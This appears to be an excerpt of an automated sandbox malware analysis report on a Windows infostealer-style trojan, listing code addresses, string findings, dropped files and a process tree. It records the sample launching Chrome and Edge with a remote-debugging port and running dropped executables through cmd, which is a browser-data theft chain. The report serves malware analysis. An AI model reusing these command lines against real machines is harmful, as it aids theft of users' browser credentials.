Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA2F70	0_2_6CBA2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20F20	0_2_6CC20F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4EF40	0_2_6CB4EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE68E0	0_2_6CBE68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB30820	0_2_6CB30820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6A820	0_2_6CB6A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4840	0_2_6CBB4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA09B0	0_2_6CBA09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB709A0	0_2_6CB709A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A9A0	0_2_6CB9A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB149F0	0_2_6CB149F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC9E0	0_2_6CBFC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB36900	0_2_6CB36900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB18960	0_2_6CB18960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5EA80	0_2_6CB5EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98A30	0_2_6CB98A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8EA00	0_2_6CB8EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5CA70	0_2_6CB5CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80BA0	0_2_6CB80BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE6BE0	0_2_6CBE6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0A480	0_2_6CC0A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB264D0	0_2_6CB264D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7A4D0	0_2_6CB7A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6A430	0_2_6CB6A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB44420	0_2_6CB44420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8460	0_2_6CAF8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD45B0	0_2_6CAD45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6E5F0	0_2_6CB6E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAA5E0	0_2_6CBAA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC28550	0_2_6CC28550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80570	0_2_6CB80570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB42560	0_2_6CB42560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB38540	0_2_6CB38540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4540	0_2_6CBE4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3E6E0	0_2_6CB3E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7E6E0	0_2_6CB7E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB046D0	0_2_6CB046D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3C650	0_2_6CB3C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0A7D0	0_2_6CB0A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB60700	0_2_6CB60700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBC0B0	0_2_6CBBC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF00B0	0_2_6CAF00B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD8090	0_2_6CAD8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA8010	0_2_6CBA8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC000	0_2_6CBAC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2E070	0_2_6CB2E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE01E0	0_2_6CAE01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB56130	0_2_6CB56130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC4130	0_2_6CBC4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48140	0_2_6CB48140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC662C0	0_2_6CC662C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAE2B0	0_2_6CBAE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB22A0	0_2_6CBB22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8220	0_2_6CBB8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAA210	0_2_6CBAA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68260	0_2_6CB68260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78250	0_2_6CB78250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3E3B0	0_2_6CB3E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB123A0	0_2_6CB123A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB343E0	0_2_6CB343E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB52320	0_2_6CB52320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC22370	0_2_6CC22370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76370	0_2_6CB76370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE2370	0_2_6CAE2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC360	0_2_6CBFC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE8340	0_2_6CAE8340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1DCD0	0_2_6CC1DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7FC80	0_2_6CB7FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA1CE0	0_2_6CBA1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC09C40	0_2_6CC09C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1C30	0_2_6CAF1C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE3C40	0_2_6CAE3C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD3D80	0_2_6CAD3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC29D90	0_2_6CC29D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1DC0	0_2_6CBB1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB43D00	0_2_6CB43D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03EC0	0_2_6CB03EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC65E60	0_2_6CC65E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEDE10	0_2_6CBEDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3BE70	0_2_6CC3BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC63FC0	0_2_6CC63FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01F90	0_2_6CB01F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8BFF0	0_2_6CB8BFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFDFC0	0_2_6CBFDFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB15F20	0_2_6CB15F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD5F30	0_2_6CAD5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC37F20	0_2_6CC37F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3B8F0	0_2_6CC3B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBF8F0	0_2_6CBBF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAED8E0	0_2_6CAED8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB138E0	0_2_6CB138E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7F8C0	0_2_6CB7F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3D810	0_2_6CB3D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1990	0_2_6CBB1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1980	0_2_6CAF1980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB459F0	0_2_6CB459F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB779F0	0_2_6CB779F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB199D0	0_2_6CB199D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB799C0	0_2_6CB799C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95920	0_2_6CB95920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2F900	0_2_6CC2F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5F960	0_2_6CB5F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D960	0_2_6CB9D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBDAB0	0_2_6CBBDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE1AE0	0_2_6CAE1AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDA30	0_2_6CBDDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC69A50	0_2_6CC69A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1FA10	0_2_6CB1FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB81A10	0_2_6CB81A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9BB0	0_2_6CBA9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB39BA0	0_2_6CB39BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC5B90	0_2_6CBC5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD1B80	0_2_6CAD1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB27BF0	0_2_6CB27BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2BB20	0_2_6CB2BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBFB60	0_2_6CBBFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE14E0	0_2_6CAE14E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC614A0	0_2_6CC614A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC9430	0_2_6CBC9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6D410	0_2_6CB6D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB19590	0_2_6CB19590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB655F0	0_2_6CB655F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB47500	0_2_6CB47500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF5510	0_2_6CAF5510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2F510	0_2_6CC2F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB116A0	0_2_6CB116A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB496A0	0_2_6CB496A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB57610	0_2_6CB57610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB09600	0_2_6CB09600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB35640	0_2_6CB35640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF9650	0_2_6CAF9650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC237C0	0_2_6CC237C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6B7A0	0_2_6CB6B7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03720	0_2_6CB03720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9720	0_2_6CBB9720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4D710	0_2_6CB4D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB97090	0_2_6CB97090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2B020	0_2_6CB2B020
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00197049	16_2_00197049
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00198860	16_2_00198860
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_001978BB	16_2_001978BB
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_001931A8	16_2_001931A8
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00154B30	16_2_00154B30
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00192D10	16_2_00192D10
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00154DE0	16_2_00154DE0
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00187F36	16_2_00187F36
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0019779B	16_2_0019779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F7049	17_2_005F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F8860	17_2_005F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F78BB	17_2_005F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F31A8	17_2_005F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005B4B30	17_2_005B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F2D10	17_2_005F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005B4DE0	17_2_005B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005E7F36	17_2_005E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005F779B	17_2_005F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F7049	18_2_005F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F8860	18_2_005F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F78BB	18_2_005F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F31A8	18_2_005F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005B4B30	18_2_005B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F2D10	18_2_005F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005B4DE0	18_2_005B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005E7F36	18_2_005E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005F779B	18_2_005F779B

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005CDF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 005C80C0 appears 260 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB03620 appears 98 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC609D0 appears 353 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC19F30 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC6D930 appears 71 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB09B10 appears 109 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC6DAE0 appears 89 times
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: String function: 001680C0 appears 130 times

PE file overlay found

Source: 931e3b56d4.exe.20.dr	Static PE information: Data appended to the last section found
Source: random[1].exe.0.dr	Static PE information: Data appended to the last section found

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2009022640.000000006FE52000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2008277067.000000006CCB5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.997838356316726
Source: random[1].exe.0.dr	Static PE information: Section: zhhhapid ZLIB complexity 0.9954010928856791
Source: 931e3b56d4.exe.20.dr	Static PE information: Section: ZLIB complexity 0.997838356316726
Source: 931e3b56d4.exe.20.dr	Static PE information: Section: zhhhapid ZLIB complexity 0.9954010928856791

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@38/60@6/8

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB40300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CB40300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\STFTSJRY.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1607838864.000000001D159000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742832864.000000001D14D000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr, EGIDBFBFHJDGCAKEGHJE.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005279196.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1960,i,3989721194292092949,15909847573822481878,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2176,i,5053567703941882623,5826024289119121658,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2060,i,13102130141342141745,5107454723265991497,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
